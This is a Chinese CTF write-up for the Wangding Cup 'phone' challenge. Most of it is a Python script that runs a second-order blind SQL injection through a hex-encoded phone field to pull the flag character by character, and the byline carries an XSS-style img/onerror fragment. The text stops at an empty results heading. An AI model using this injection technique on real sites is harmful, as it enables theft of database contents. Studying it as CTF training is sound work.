网鼎杯题目“phone”--十六进制mysql注入

Posted 2021-01-03 u003ciMg/src=~ Onerr0r-->B1

 

 

 

注册后，即可点击查看谁的电话和我类似。

注册时有三个必填项，分别是用户名、密码和电话。电话要求必须数字。

注册个1111的电话后，点击查看，返回有1个人电话和我类似，在注册一个为1111的，返回有2人电话和我类似。 说明连数据库查询了，而且只返回数字。

盲注的思路，注册时电话填写十六进制。

于是python如下：

#coding=utf-8

import requests
import binascii
import re

def login_sqli(url,username,password,payload):
    
    url = url
    username = username
    password = password


    headers = {
    \'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0\'
    }
    
    
    
    # login
    data = {\'username\':username,
    \'password\':password,
    \'phone\':payload,
    \'register\':\'Login\'
    }
    

    try:
        #get_session
        s = requests.session()
        req1 = s.get(url+\'/index.php\')
        
        #register
        req2 = s.post(url+\'/register.php\',data = data)
        
        #sqli
        req3 = s.get(url+\'/query.php\')
        return req3.text
    
    except:
        print \'Error\'

    
    
if __name__ == \'__main__\':
    
    login_url = \'http://6705466128f243d0aff0aba9deb7317439a2f08c6e9c4760.game.ichunqiu.com\'
    password = \'123123\'
    result = \'\'
    pattern = re.compile(r\'\\d?\\d?\\d?\\d?\\d?\\d\')

    for i in range(1,43):
        for j in range(33,128):

            payload = "5555%%\' and ord(mid((select * from flag),%d,1))=%d #" %(i,j)
            payload_0x = binascii.b2a_hex(payload)
            _payload = \'0x\'+payload_0x

            username = \'userrif\'+str(i)+str(j)

            text = login_sqli(login_url,username,password,_payload)
            #time.sleep(3)

            r = re.search(pattern,text)

            if(int(r.group()) > 0):
                print str(i)+\'-->\'+chr(j)
            else:
                continue

结果：